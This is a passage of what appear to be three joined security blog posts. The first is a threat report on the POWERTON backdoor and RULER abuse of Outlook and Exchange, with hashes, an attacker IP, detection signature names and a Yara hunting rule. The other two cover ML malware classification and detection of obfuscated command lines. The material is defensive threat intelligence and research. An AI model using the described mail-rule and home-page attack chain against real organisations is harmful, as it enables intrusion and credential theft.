We will continue to track these clusters independently until we achieve high confidence that they are the same. The operators behind each of the described intrusions are using publicly available but not widely understood tools and techniques in addition to proprietary implants as needed. Managed Defense has the privilege of being exposed to intrusion activity every day across a wide spectrum of industries and adversaries. This daily front line experience is backed by Advanced Practices, FireEye Labs Advanced Reverse Engineering (FLARE), and FireEye Intelligence to give our clients every advantage they can have against sophisticated adversaries. We welcome additional original source information we can evaluate to confirm or refute our analytical judgements on attribution.

Custom Backdoor: POWERTON

POWERTON is a backdoor written in PowerShell; FireEye has not yet identified any publicly available toolset with a similar code base, indicating that it is likely custom-built. POWERTON is designed to support multiple persistence mechanisms, including WMI and auto-run registry key. Communications with the C2 are over TCP/HTTP(S) and leverage AES encryption for communication traffic to and from the C2. POWERTON typically gets deployed as a later stage backdoor and is obfuscated several layers.

FireEye has witnessed at least two separate versions of POWERTON, tracked separately as POWERTON.v1 and POWERTON.v2, wherein the latter has improved its command and control functionality, and integrated the ability to dump password hashes.

Table 2 contains samples of POWERTON.

Hash of Obfuscated File (MD5)

Hash of Deobfuscated File (MD5)

Version

974b999186ff434bee3ab6d61411731f

3871aac486ba79215f2155f32d581dc2

V1

e2d60bb6e3e67591e13b6a8178d89736

2cd286711151efb61a15e2e11736d7d2

V1

bd80fcf5e70a0677ba94b3f7c011440e

5a66480e100d4f14e12fceb60e91371d

V1

4047e238bbcec147f8b97d849ef40ce5

f5ac89d406e698e169ba34fea59a780e

V2

c38069d0bc79acdc28af3820c1123e53

4aca006b9afe85b1f11314b39ee270f7

V2

N/A

7f4f7e307a11f121d8659ca98bc8ba56

V2

53ae59ed03fa5df3bf738bc0775a91d9

99649d58c0d502b2dfada02124b1504c

V2

Table 2: POWERTON malware samples

Adversary Methods: Email Exploitation on the Rise

Outlook and Exchange are ubiquitous with the concept of email access. User convenience is a primary driver behind technological advancements, but convenient access for users often reveals additional attack surface for adversaries. As organizations expose any email server access to the public internet for its users, those systems become intrusion vectors. FireEye has observed an increase in targeted adversaries challenging and subverting security controls on Exchange and Office365. Our Mandiant consultants also presented several new methods used by adversaries to subvert multifactor authentication at FireEye Cyber Defense Summit 2018.

At FireEye, our decisions are data driven, but data provided to us is often incomplete and missing pieces must be inferred based on our expertise in order for us to respond to intrusions effectively. A plausible scenario for exploitation of this vector is as follows.

An adversary has a single pair of valid credentials for a user within your organization obtained through any means, to include the following non-exhaustive examples:

  • Third party breaches where your users have re-used credentials; does your enterprise leverage a naming standard for email addresses such as first.last@yourorganization.tld? It is possible that a user within your organization has a personal email address with a first and last name--and an affiliated password--compromised in a third-party breach somewhere. Did they re-use that password?
  • Previous compromise within your organization where credentials were compromised but not identified or reset.
  • Poor password choice or password security policies resulting in brute-forced credentials.
  • Gathering of crackable password hashes from various other sources, such as NTLM hashes gathered via documents intended to phish them from users.
  • Credential harvesting phishing scams, where harvested credentials may be sold, re-used, or documented permanently elsewhere on the internet.

Once the adversary has legitimate credentials, they identify publicly accessible Outlook Web Access (OWA) or Office 365 that is not protected with multi-factor authentication. The adversary leverages the stolen credentials and a tool like RULER to deliver exploits through Exchange’s legitimate features.

RULER In-The-Wild: Here, There, and Everywhere

SensePost’s RULER is a tool designed to interact with Exchange servers via a messaging application programming interface (MAPI), or via remote procedure calls (RPC), both over HTTP protocol. As detailed in the "Managed Defense Rapid Responses" section, in mid-November 2017, FireEye witnessed network activity generated by an existing Outlook email client process on a single host, indicating connection via Web Distributed Authoring and Versioning (WebDAV) to an adversary-controlled IP address 85.206.161[.]214. This communication retrieved an executable created with Aut2Exe (MD5: 95f3bea43338addc1ad951cd2d42eb6f), and executed a PowerShell one-liner to retrieve further malicious content.

Without the requisite logging from the impacted mailbox, we can still assess that this activity was the result of a malicious mail rule created using the aforementioned tooling for the following reasons:

  • Outlook.exe directly requested the malicious executable hosted at the adversary IP address over WebDAV. This is unexpected unless some feature of Outlook directly was exploited; traditional vectors like phishing would show a process ancestry where Outlook spawned a child process of an Office product, Acrobat, or something similar. Process injection would imply prior malicious code execution on the host, which evidence did not support.
  • The transfer of 95f3bea43338addc1ad951cd2d42eb6f was over WebDAV. RULER facilitates this by exposing a simple WebDAV server, and a command line module for creating a client-side mail rule to point at that WebDAV hosted payload.
  • The choice of WebDAV for this initial transfer of stager is the result of restrictions in mail rule creation; the payload must be "locally" accessible before the rule can be saved, meaning protocol handlers for something like HTTP or FTP are not permitted. This is thoroughly detailed in Silent Break Security's initial write-up prior to RULER’s creation. This leaves SMB and WebDAV via UNC file pathing as the available options for transferring your malicious payload via an Outlook Rule. WebDAV is likely the less alerting option from a networking perspective, as one is more likely to find WebDAV transactions occurring over ports 80 and 443 to the internet than they are to find a domain joined host communicating via SMB to a non-domain joined host at an arbitrary IP address.
  • The payload to be executed via Outlook client-side mail rule must contain no arguments, which is likely why a compiled Aut2exe executable was chosen. 95f3bea43338addc1ad951cd2d42eb6f does nothing but execute a PowerShell one-liner to retrieve additional malicious content for execution. However, execution of this command natively using an Outlook rule was not possible due to this limitation.

With that in mind, the initial infection vector is illustrated in Figure 4.


Figure 4: Initial infection vector

As both attackers and defenders continue to explore email security, publicly-released techniques and exploits are quickly adopted. SensePost's identification and responsible disclosure of CVE-2017-11774 was no different. For an excellent description of abusing Outlook's home page for shell and persistence from an attacker’s perspective, refer to SensePost's blog.

FireEye has observed and documented an uptick in several malicious attackers' usage of this specific home page exploitation technique. Based on our experience, this particular method may be more successful due to defenders misinterpreting artifacts and focusing on incorrect mitigations. This is understandable, as some defenders may first learn of successful CVE-2017-11774 exploitation when observing Outlook spawning processes resulting in malicious code execution. When this observation is combined with standalone forensic artifacts that may look similar to malicious HTML Application (.hta) attachments, the evidence may be misinterpreted as initial infection via a phishing email. This incorrect assumption overlooks the fact that attackers require valid credentials to deploy CVE-2017-11774, and thus the scope of the compromise may be greater than individual users' Outlook clients where home page persistence is discovered. To assist defenders, we're including a Yara rule to differentiate these Outlook home page payloads at the end of this post.

Understanding this nuance further highlights the exposure to this technique when combined with password spraying as documented with this attacker, and underscores the importance of layered email security defenses, including multi-factor authentication and patch management. We recommend the organizations reduce their email attack surface as much as possible. Of note, organizations that choose to host their email with a cloud service provider must still ensure the software clients used to access that server are patched. Beyond implementing multi-factor authentication for Outlook 365/Exchange access, the Microsoft security updates in Table 3 will assist in mitigating known and documented attack vectors that are exposed for exploitation by toolkits such as SensePost’s RULER.

Microsoft Outlook Security Update

RULER Module Addressed

June 13, 2017 Security Update

RULER.RULES

September 12, 2017 Security Update

RULER.FORMS

October 10, 2017 Security Update

RULER.HOMEPAGE

Table 3: Outlook attack surface mitigations

Detecting the Techniques

FireEye detected this activity across our platform, including named detection for POSHC2, PUPYRAT, and POWERTON. Table 4 contains several specific detection names that applied to the email exploitation and initial infection activity.

PLATFORM

SIGNATURE NAME

Endpoint Security

POWERSHELL ENCODED REMOTE DOWNLOAD (METHODOLOGY)
SUSPICIOUS POWERSHELL USAGE (METHODOLOGY)
MIMIKATZ (CREDENTIAL STEALER)
RULER OUTLOOK PERSISTENCE (UTILITY)

Network and Email Security

FE_Exploit_HTML_CVE201711774
FE_HackTool_Win_RULER
FE_HackTool_Linux_RULER
FE_HackTool_OSX_RULER
FE_Trojan_OLE_RULER
HackTool.RULER (Network Traffic)

Table 4: FireEye product detections

For organizations interested in hunting for Outlook home page shell and persistence, we’ve included a Yara rule that can also be used for context to differentiate these payloads from other scripts:

rule Hunting_Outlook_Homepage_Shell_and_Persistence
{
meta:
        author = "Nick Carr (@itsreallynick)"
        reference_hash = "506fe019d48ff23fac8ae3b6dd754f6e"
    strings:
        $script_1 = "<htm" ascii nocase wide
        $script_2 = "<script" ascii nocase wide
        $viewctl1_a = "ViewCtl1" ascii nocase wide
        $viewctl1_b = "0006F063-0000-0000-C000-000000000046" ascii wide
        $viewctl1_c = ".OutlookApplication" ascii nocase wide
    condition:
        uint16(0) != 0x5A4D and all of ($script*) and any of ($viewctl1*)
}

Acknowledgements

The authors would like to thank Matt Berninger for providing data science support for attribution augmentation projects, Omar Sardar (FLARE) for reverse engineering POWERTON, and Joseph Reyes (FireEye Labs) for continued comprehensive Outlook client exploitation product coverage.

What are Deep Neural Networks Learning About Malware?

An increasing number of modern antivirus solutions rely on machine learning (ML) techniques to protect users from malware. While ML-based approaches, like FireEye Endpoint Security’s MalwareGuard capability, have done a great job at detecting new threats, they also come with substantial development costs. Creating and curating a large set of useful features takes significant amounts of time and expertise from malware analysts and data scientists (note that in this context a feature refers to a property or characteristic of the executable that can be used to distinguish between goodware and malware). In recent years, however, deep learning approaches have shown impressive results in automatically learning feature representations for complex problem domains, like images, speech, and text. Can we take advantage of these advances in deep learning to automatically learn how to detect malware without costly feature engineering?

As it turns out, deep learning architectures, and in particular convolutional neural networks (CNNs), can do a good job of detecting malware simply by looking at the raw bytes of Windows Portable Executable (PE) files. Over the last two years, FireEye has been experimenting with deep learning architectures for malware classification, as well as methods to evade them. Our experiments have demonstrated surprising levels of accuracy that are competitive with traditional ML-based solutions, while avoiding the costs of manual feature engineering. Since the initial presentation of our findings, other researchers have published similarly impressive results, with accuracy upwards of 96%.

Since these deep learning models are only looking at the raw bytes without any additional structural, semantic, or syntactic context, how can they possibly be learning what separates goodware from malware? In this blog post, we answer this question by analyzing FireEye’s deep learning-based malware classifier.

Highlights

  • FireEye’s deep learning classifier can successfully identify malware using only the unstructured bytes of the Windows PE file.
  • Import-based features, like names and function call fingerprints, play a significant role in the features learned across all levels of the classifier.
  • Unlike other deep learning application areas, where low-level features tend to generally capture properties across all classes, many of our low-level features focused on very specific sequences primarily found in malware.
  • End-to-end analysis of the classifier identified important features that closely mirror those created through manual feature engineering, which demonstrates the importance of classifier depth in capturing meaningful features.

Background

Before we dive into our analysis, let’s first discuss what a CNN classifier is doing with Windows PE file bytes. Figure 1 shows the high-level operations performed by the classifier while “learning” from the raw executable data. We start with the raw byte representation of the executable, absent any structure that might exist (1). This raw byte sequence is embedded into a high-dimensional space where each byte is replaced with an n-dimensional vector of values (2). This embedding step allows the CNN to learn relationships among the discrete bytes by moving them within the n-dimensional embedding space. For example, if the bytes 0xe0 and 0xe2 are used interchangeably, then the CNN can move those two bytes closer together in the embedding space so that the cost of replacing one with the other is small. Next, we perform convolutions over the embedded byte sequence (3). As we do this across our entire training set, our convolutional filters begin to learn the characteristics of certain sequences that differentiate goodware from malware (4). In simpler terms, we slide a fixed-length window across the embedded byte sequence and the convolutional filters learn the important features from across those windows. Once we have scanned the entire sequence, we can then pool the convolutional activations to select the best features from each section of the sequence (i.e., those that maximally activated the filters) to pass along to the next level (5). In practice, the convolution and pooling operations are used repeatedly in a hierarchical fashion to aggregate many low-level features into a smaller number of high-level features that are more useful for classification. Finally, we use the aggregated features from our pooling as input to a fully-connected neural network, which classifies the PE file sample as either goodware or malware (6).


Figure 1: High-level overview of a convolutional neural network applied to raw bytes from a Windows PE files.

The specific deep learning architecture that we analyze here actually has five convolutional and max pooling layers arranged in a hierarchical fashion, which allows it to learn complex features by combining those discovered at lower levels of the hierarchy. To efficiently train such a deep neural network, we must restrict our input sequences to a fixed length – truncating any bytes beyond this length or using special padding symbols to fill out smaller files. For this analysis, we chose an input length of 100KB, though we have experimented with lengths upwards of 1MB. We trained our CNN model on more than 15 million Windows PE files, 80% of which were goodware and the remainder malware. When evaluated against a test set of nearly 9 million PE files observed in the wild from June to August 2018, the classifier achieves an accuracy of 95.1% and an F1 score of 0.96, which are on the higher end of scores reported by previous work.

In order to figure out what this classifier has learned about malware, we will examine each component of the architecture in turn. At each step, we use either a sample of 4,000 PE files taken from our training data to examine broad trends, or a smaller set of six artifacts from the NotPetya, WannaCry, and BadRabbit ransomware families to examine specific features.

Bytes in (Embedding) Space

The embedding space can encode interesting relationships that the classifier has learned about the individual bytes and determine whether certain bytes are treated differently than others because of their implied importance to the classifier’s decision. To tease out these relationships, we will use two tools: (1) a dimensionality reduction technique called multi-dimensional scaling (MDS) and (2) a density-based clustering method called HDBSCAN. The dimensionality reduction technique allows us to move from the high-dimensional embedding space to an approximation in two-dimensional space that we can easily visualize, while still retaining the overall structure and organization of the points. Meanwhile, the clustering technique allows us to identify dense groups of points, as well as outliers that have no nearby points. The underlying intuition being that outliers are treated as “special” by the model since there are no other points that can easily replace them without a significant change in upstream calculations, while dense clusters of points can be used interchangeably.


Figure 2: Visualization of the byte embedding space using multi-dimensional scaling (MDS) and clustered with hierarchical density-based clustering (HDBSCAN) with clusters (Left) and outliers labeled (Right).

On the left side of Figure 2, we show the two-dimensional representation of our byte embedding space with each of the clusters labeled, along with an outlier cluster labeled as -1. As you can see, the vast majority of bytes fall into one large catch-all class (Cluster 3), while the remaining three clusters have just two bytes each. Though there are no obvious semantic relationships in these clusters, the bytes that were included are interesting in their own right – for instance, Cluster 0 includes our special padding byte that is only used when files are smaller than the fixed-length cutoff, and Cluster 1 includes the ASCII character ‘r.’

What is more fascinating, however, is the set of outliers that the clustering produced, which are shown in the right side of Figure 3.  Here, there are a number of intriguing trends that start to appear. For one, each of the bytes in the range 0x0 to 0x6 are present, and these bytes are often used in short forward jumps or when registers are used as instruction arguments (e.g., eax, ebx, etc.). Interestingly, 0x7 and 0x8 are grouped together in Cluster 2, which may indicate that they are used interchangeably in our training data even though 0x7 could also be interpreted as a register argument. Another clear trend is the presence of several ASCII characters in the set of outliers, including ‘\n’, ‘A’, ‘e’, ‘s’, and ‘t.’ Finally, we see several opcodes present, including the call instruction (0xe8), loop and loopne (0xe0, 0xe2), and a breakpoint instruction (0xcc).

Given these findings, we immediately get a sense of what the classifier might be looking for in low-level features: ASCII text and usage of specific types of instructions.

Deciphering Low-Level Features

The next step in our analysis is to examine the low-level features learned by the first layer of convolutional filters. In our architecture, we used 96 convolutional filters at this layer, each of which learns basic building-block features that will be combined across the succeeding layers to derive useful high-level features. When one of these filters sees a byte pattern that it has learned in the current convolution, it will produce a large activation value and we can use that value as a method for identifying the most interesting bytes for each filter. Of course, since we are examining the raw byte sequences, this will merely tell us which file offsets to look at, and we still need to bridge the gap between the raw byte interpretation of the data and something that a human can understand. To do so, we parse the file using PEFile and apply BinaryNinja’s disassembler to executable sections to make it easier to identify common patterns among the learned features for each filter.

Since there are a large number of filters to examine, we can narrow our search by getting a broad sense of which filters have the strongest activations across our sample of 4,000 Windows PE files and where in those files those activations occur. In Figure 3, we show the locations of the 100 strongest activations across our 4,000-sample dataset. This shows a couple of interesting trends, some of which could be expected and others that are perhaps more surprising. For one, the majority of the activations at this level in our architecture occur in the ‘.text’ section, which typically contains executable code. When we compare the ‘.text’ section activations between malware and goodware subsets, there are significantly more activations for the malware set, meaning that even at this low level there appear to be certain filters that have keyed in on specific byte sequences primarily found in malware. Additionally, we see that the ‘UNKNOWN’ section– basically, any activation that occurs outside the valid bounds of the PE file – has many more activations in the malware group than in goodware. This makes some intuitive sense since many obfuscation and evasion techniques rely on placing data in non-standard locations (e.g., embedding PE files within one another).


Figure 3: Distribution of low-level activation locations across PE file headers and sections. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right). UNKNOWN indicates an area outside the valid bounds of the file and NULL indicates an empty section name.

We can also examine the activation trends among the convolutional filters by plotting the top-100 activations for each filter across our 4,000 PE files, as shown in Figure 4. Here, we validate our intuition that some of these filters are overwhelmingly associated with features found in our malware samples. In this case, the activations for Filter 57 occur almost exclusively in the malware set, so that will be an important filter to look at later in our analysis. The other main takeaway from the distribution of filter activations is that the distribution is quite skewed, with only two filters handling the majority of activations at this level in our architecture. In fact, some filters are not activated at all on the set of 4,000 files we are analyzing.


Figure 4: Distribution of activations over each of the 96 low-level convolutional filters. Overall distribution of activations (Left), and activations for goodware/malware subsets (Right).

Now that we have identified the most interesting and active filters, we can disassemble the areas surrounding their activation locations and see if we can tease out some trends. In particular, we are going to look at Filters 83 and 57, both of which were important filters in our model based on activation value. The disassembly results for these filters across several of our ransomware artifacts is shown in Figure 5.

For Filter 83, the trend in activations becomes pretty clear when we look at the ASCII encoding of the bytes, which shows that the filter has learned to detect certain types of imports. If we look closer at the activations (denoted with a ‘*’), these always seem to include characters like ‘r’, ‘s’, ‘t’, and ‘e’, all of which were identified as outliers or found in their own unique clusters during our embedding analysis.  When we look at the disassembly of Filter 57’s activations, we see another clear pattern, where the filter activates on sequences containing multiple push instructions and a call instruction – essentially, identifying function calls with multiple parameters.

In some ways, we can look at Filters 83 and 57 as detecting two sides of the same overarching behavior, with Filter 83 detecting the imports and 57 detecting the potential use of those imports (i.e., by fingerprinting the number of parameters and usage). Due to the independent nature of convolutional filters, the relationships between the imports and their usage (e.g., which imports were used where) is lost, and that the classifier treats these as two completely independent features.


Figure 5: Example disassembly of activations for filters 83 (Left) and 57 (Right) from ransomware samples. Lines prepended with '*' contain the actual filter activations, others are provided for context.

Aside from the import-related features described above, our analysis also identified some filters that keyed in on particular byte sequences found in functions containing exploit code, such as DoublePulsar or EternalBlue. For instance, Filter 94 activated on portions of the EternalRomance exploit code from the BadRabbit artifact we analyzed. Note that these low-level filters did not necessarily detect the specific exploit activity, but instead activate on byte sequences within the surrounding code in the same function.

These results indicate that the classifier has learned some very specific byte sequences related to ASCII text and instruction usage that relate to imports, function calls, and artifacts found within exploit code. This finding is surprising because in other machine learning domains, such as images, low-level filters often learn generic, reusable features across all classes.

Bird’s Eye View of End-to-End Features

While it seems that lower layers of our CNN classifier have learned particular byte sequences, the larger question is: does the depth and complexity of our classifier (i.e., the number of layers) help us extract more meaningful features as we move up the hierarchy? To answer this question, we have to examine the end-to-end relationships between the classifier’s decision and each of the input bytes. This allows us to directly evaluate each byte (or segment thereof) in the input sequence and see whether it pushed the classifier toward a decision of malware or goodware, and by how much. To accomplish this type of end-to-end analysis, we leverage the SHapley Additive exPlanations (SHAP) framework developed by Lundberg and Lee. In particular, we use the GradientSHAP method that combines a number of techniques to precisely identify the contributions of each input byte, with positive SHAP values indicating areas that can be considered to be malicious features and negative values for benign features.

After applying the GradientSHAP method to our ransomware dataset, we noticed that many of the most important end-to-end features were not directly related to the types of specific byte sequences that we discovered at lower layers of the classifier. Instead, many of the end-to-end features that we discovered mapped closely to features developed from manual feature engineering in our traditional ML models. As an example, the end-to-end analysis on our ransomware samples identified several malicious features in the checksum portion of the PE header, which is commonly used as a feature in traditional ML models. Other notable end-to-end features included the presence or absence of certain directory information related to certificates used to sign the PE files, anomalies in the section table that define the properties of the various sections of the PE file, and specific imports that are often used by malware (e.g., GetProcAddress and VirtualAlloc).

In Figure 6, we show the distribution of SHAP values across the file offsets for the worm artifact of the WannaCry ransomware family. Many of the most important malicious features found in this sample are focused in the PE header structures, including previously mentioned checksum and directory-related features. One particularly interesting observation from this sample, though, is that it contains another PE file embedded within it, and the CNN discovered two end-to-end features related to this. First, it identified an area of the section table that indicated the ‘.data’ section had a virtual size that was more than 10x larger than the stated physical size of the section. Second, it discovered maliciously-oriented imports and exports within the embedded PE file itself. Taken as a whole, these results show that the depth of our classifier appears to have helped it learn more abstract features and generalize beyond the specific byte sequences we observed in the activations at lower layers.


Figure 6: SHAP values for file offsets from the worm artifact of WannaCry. File offsets with positive values are associated with malicious end-to-end features, while offsets with negative values are associated with benign features.

Summary

In this blog post, we dove into the inner workings of FireEye’s byte-based deep learning classifier in order to understand what it, and other deep learning classifiers like it, are learning about malware from its unstructured raw bytes. Through our analysis, we have gained insight into a number of important aspects of the classifier’s operation, weaknesses, and strengths:

  • Import Features: Import-related features play a large role in classifying malware across all levels of the CNN architecture. We found evidence of ASCII-based import features in the embedding layer, low-level convolutional features, and end-to-end features.
  • Low-Level Instruction Features: Several features discovered at the lower layers of our CNN classifier focused on sequences of instructions that capture specific behaviors, such as particular types of function calls or code surrounding certain types of exploits. In many cases, these features were primarily associated with malware, which runs counter to the typical use of CNNs in other domains, such as image classification, where low-level features capture generic aspects of the data (e.g., lines and simple shapes). Additionally, many of these low-level features did not appear in the most malicious end-to-end features.
  • End-to-End Features: Perhaps the most interesting result of our analysis is that many of the most important maliciously-oriented end-to-end features closely map to common manually-derived features from traditional ML classifiers. Features like the presence or absence of certificates, obviously mangled checksums, and inconsistencies in the section table do not have clear analogs to the lower-level features we uncovered. Instead, it appears that the depth and complexity of our CNN classifier plays a key role in generalizing from specific byte sequences to meaningful and intuitive features.

It is clear that deep learning offers a promising path toward sustainable, cutting-edge malware classification. At the same time, significant improvements will be necessary to create a viable real-world solution that addresses the shortcomings discussed in this article. The most important next step will be improving the architecture to include more information about the structural, semantic, and syntactic context of the executable rather than treating it as an unstructured byte sequence. By adding this specialized domain knowledge directly into the deep learning architecture, we allow the classifier to focus on learning relevant features for each context, inferring relationships that would not be possible otherwise, and creating even more robust end-to-end features with better generalization properties.

The content of this blog post is based on research presented at the Conference on Applied Machine Learning for Information Security (CAMLIS) in Washington, DC on Oct. 12-13, 2018. Additional material, including slides and a video of the presentation, can be found on the conference website.

Obfuscated Command Line Detection Using Machine Learning

This blog post presents a machine learning (ML) approach to solving an emerging security problem: detecting obfuscated Windows command line invocations on endpoints. We start out with an introduction to this relatively new threat capability, and then discuss how such problems have traditionally been handled. We then describe a machine learning approach to solving this problem and point out how ML vastly simplifies development and maintenance of a robust obfuscation detector. Finally, we present the results obtained using two different ML techniques and compare the benefits of each.

Introduction

Malicious actors are increasingly “living off the land,” using built-in utilities such as PowerShell and the Windows Command Processor (cmd.exe) as part of their infection workflow in an effort to minimize the chance of detection and bypass whitelisting defense strategies. The release of new obfuscation tools makes detection of these threats even more difficult by adding a layer of indirection between the visible syntax and the final behavior of the command. For example, Invoke-Obfuscation and Invoke-DOSfuscation are two recently released tools that automate the obfuscation of Powershell and Windows command lines respectively.

The traditional pattern matching and rule-based approaches for detecting obfuscation are difficult to develop and generalize, and can pose a huge maintenance headache for defenders. We will show how using ML techniques can address this problem.

Detecting obfuscated command lines is a very useful technique because it allows defenders to reduce the data they must review by providing a strong filter for possibly malicious activity. While there are some examples of “legitimate” obfuscation in the wild, in the overwhelming majority of cases, the presence of obfuscation generally serves as a signal for malicious intent.

Background

There has been a long history of obfuscation being employed to hide the presence of malware, ranging from encryption of malicious payloads (starting with the Cascade virus) and obfuscation of strings, to JavaScript obfuscation. The purpose of obfuscation is two-fold:

  • Make it harder to find patterns in executable code, strings or scripts that can easily be detected by defensive software.
  • Make it harder for reverse engineers and analysts to decipher and fully understand what the malware is doing.

In that sense, command line obfuscation is not a new problem – it is just that the target of obfuscation (the Windows Command Processor) is relatively new. The recent release of tools such as Invoke-Obfuscation (for PowerShell) and Invoke-DOSfuscation (for cmd.exe) have demonstrated just how flexible these commands are, and how even incredibly complex obfuscation will still run commands effectively.

There are two categorical axes in the space of obfuscated vs. non-obfuscated command lines: simple/complex and clear/obfuscated (see Figure 1 and Figure 2). For this discussion “simple” means generally short and relatively uncomplicated, but can still contain obfuscation, while “complex” means long, complicated strings that may or may not be obfuscated. Thus, the simple/complex axis is orthogonal to obfuscated/unobfuscated. The interplay of these two axes produce many boundary cases where simple heuristics to detect if a script is obfuscated (e.g. length of a command) will produce false positives on unobfuscated samples. The flexibility of the command line processor makes classification a difficult task from an ML perspective.


Figure 1: Dimensions of obfuscation


Figure 2: Examples of weak and strong obfuscation

Traditional Obfuscation Detection

Traditional obfuscation detection can be split into three approaches. One approach is to write a large number of complex regular expressions to match the most commonly abused syntax of the Windows command line. Figure 3 shows one such regular expression that attempts to match ampersand chaining with a call command, a common pattern seen in obfuscation. Figure 4 shows an example command sequence this regex is designed to detect.


Figure 3: A common obfuscation pattern captured as a regular expression


Figure 4: A common obfuscation pattern (calling echo in obfuscated fashion in this example)

There are two problems with this approach. First, it is virtually impossible to develop regular expressions to cover every possible abuse of the command line. The flexibility of the command line results in a non-regular language, which is feasible yet impractical to express using regular expressions. A second issue with this approach is that even if a regular expression exists for the technique a malicious sample is using, a determined attacker can make minor modifications to avoid the regular expression. Figure 5 shows a minor modification to the sequence in Figure 4, which avoids the regex detection.


Figure 5: A minor change (extra carets) to an obfuscated command line that breaks the regular expression in Figure 3

The second approach, which is closer to an ML approach, involves writing complex if-then rules. However, these rules are hard to derive, are complex to verify, and pose a significant maintenance burden as authors evolve to escape detection by such rules. Figure 6 shows one such if-then rule.


Figure 6: An if-then rule that *may* indicate obfuscation (notice how loose this rule is, and how false positives are likely)

A third approach is to combine regular expressions and if-then rules. This greatly complicates the development and maintenance burden, and still suffers from the same weaknesses that make the first two approaches fragile. Figure 7 shows an example of an if-then rule with regular expressions. Clearly, it is easy to appreciate how burdensome it is to generate, test, maintain and determine the efficacy of such rules.


Figure 7: A combination of an if-then rule with regular expressions to detect obfuscation (a real hand-built obfuscation detector would consist of tens or hundreds of rules and still have gaps in its detection)

The ML Approach – Moving Beyond Pattern Matching and Rules

Using ML simplifies the solution to these problems. We will illustrate two ML approaches: a feature-based approach and a feature-less end-to-end approach.

There are some ML techniques that can work with any kind of raw data (provided it is numeric), and neural networks are a prime example. Most other ML algorithms require the modeler to extract pertinent information, called features, from raw data before they are fed into the algorithm. Some examples of this latter type are tree-based algorithms, which we will also look at in this blog (we described the structure and uses of Tree-Based algorithms in a previous blog post, where we used a Gradient-Boosted Tree-Based Model).

ML Basics – Neural Networks

Neural networks are a type of ML algorithm that have recently become very popular and consist of a series of elements called neurons. A neuron is essentially an element that takes a set of inputs, computes a weighted sum of these inputs, and then feeds the sum into a non-linear function. It has been shown that a relatively shallow network of neurons can approximate any continuous mapping between input and output. The specific type of neural network we used for this research is what is called a Convolutional Neural Network (CNN), which was developed primarily for computer vision applications, but has also found success in other domains including natural language processing. One of the main benefits of a neural network is that it can be trained without having to manually engineer features.

Featureless ML

While neural networks can be used with feature data, one of the attractions of this approach is that it can work with raw data (converted into numeric form) without doing any feature design or extraction. The first step in the model is converting text data into numeric form. We used a character-based encoding where each character type was encoded by a real valued number. The value was automatically derived during training and conveys semantic information about the relationships between characters as they apply to cmd.exe syntax.

Feature-Based ML

We also experimented with hand-engineered features and a Gradient Boosted Decision Tree algorithm. The features developed for this model were largely statistical in nature – derived from the presence and frequency of character sets and keywords. For example, the presence of dozens of ‘%’ characters or long, contiguous strings might contribute to detecting potential obfuscation. While any single feature will not perfectly separate the two classes, a combination of features as present in a tree-based model can learn flexible patterns in the data. The expectation is that those patterns are robust and can generalize to future obfuscation variants.

Data and Experiments

To develop our models, we collected non-obfuscated data from tens of thousands of endpoint events and generated obfuscated data using a variety of methods in Invoke-DOSfuscation. We developed our models using roughly 80 percent of the data as training data, and tested them on the remaining 20 percent. We ensured that our train-test split was stratified. For featureless ML (i.e. neural networks), we simply input Unicode code points into the first layer of the CNN model. The first layer converts the code point into semantically meaningful numerical representations (called embeddings) before feeding it into the rest of the neural network.

For the Gradient Boosted Tree method, we generated a number of features from the raw command lines. The following are some of them:

  • Length of the command line
  • The number of carets in the command line
  • The count of pipe symbols
  • The fraction of white space in the command line
  • The fraction of special characters
  • Entropy of the string
  • The frequency of the strings “cmd” and “power” in the command line

While each of these features individually is a weak signal and could not possibly be a good discriminator on its own, a flexible classifier such as a Gradient Boosted Tree – trained on sufficient data with these features – is able to classify obfuscated and non-obfuscated command lines in spite of the aforementioned difficulties.

Results

Evaluated against our test set, we were able to get nearly identical results from our Gradient Boosted Tree and neural network models.

The results for the GBT model were near perfect with metrics such as F1-score, precision, and recall all being close to 1.0. The CNN model was slightly less accurate.

While we certainly do not expect perfect results in a real-world scenario, these lab results were nonetheless encouraging. Recall that all of our obfuscated examples were generated by one source, namely the Invoke-DOSfuscation tool. While Invoke-DOSfuscation generates a wide variety of obfuscated samples, in the real world we expect to see at least some samples that are quite dissimilar from any that Invoke-DOSfuscation generates. We are currently collecting real world obfuscated command lines to get a more accurate picture of the generalizability of this model on obfuscated samples from actual malicious actors. We expect that command obfuscation, similar to PowerShell obfuscation before it, will continue to emerge in new malware families.

As an additional test we asked Daniel Bohannon (author of Invoke-DOSfuscation, the Windows command line obfuscation tool) to come up with obfuscated samples that in his experience would be difficult for a traditional obfuscation detector. In every case, our ML detector was still able to detect obfuscation. Some examples are shown in Figure 8.


Figure 8: Some examples of obfuscated text used to test and attempt to defeat the ML obfuscation detector (all were correctly identified as obfuscated text)

We also created very cryptic looking texts that, although valid Windows command lines and non-obfuscated, appear slightly obfuscated to a human observer. This was done to test efficacy of the detector with boundary examples. The detector was correctly able to classify the text as non-obfuscated in this case as well. Figure 9 shows one such example.


Figure 9: An example that appears on first glance to be obfuscated, but isn't really and would likely fool a non-ML solution (however, the ML obfuscation detector currently identifies it as non-obfuscated)

Finally, Figure 10 shows a complicated yet non-obfuscated command line that is correctly classified by our obfuscation detector, but would likely fool a non-ML detector based on statistical features (for example a rule-based detector with a hand-crafted weighing scheme and a threshold, using features such as the proportion of special characters, length of the command line or entropy of the command line).


Figure 10: An example that would likely be misclassified by an ML detector that uses simplistic statistical features; however, our ML obfuscation detector currently identifies it as non-obfuscated

CNN vs. GBT Results

We compared the results of a heavily tuned GBT classifier built using carefully selected features to those of a CNN trained with raw data (featureless ML). While the CNN architecture was not heavily tuned, it is interesting to note that with samples such as those in Figure 10, the GBT classifier confidently predicted non-obfuscated with a score of 19.7 percent (the complement of the measure of the classifier’s confidence in non-obfuscation). Meanwhile, the CNN classifier predicted non-obfuscated with a confidence probability of 50 percent – right at the boundary between obfuscated and non-obfuscated. The number of misclassifications of the CNN model was also more than that of the Gradient Boosted Tree model. Both of these are most likely the result of inadequate tuning of the CNN, and not a fundamental shortcoming of the featureless approach.

Conclusion

In this blog post we described an ML approach to detecting obfuscated Windows command lines, which can be used as a signal to help identify malicious command line usage. Using ML techniques, we demonstrated a highly accurate mechanism for detecting such command lines without resorting to the often inadequate and costly technique of maintaining complex if-then rules and regular expressions. The more comprehensive ML approach is flexible enough to catch new variations in obfuscation, and when gaps are detected, it can usually be handled by adding some well-chosen evader samples to the training set and retraining the model.

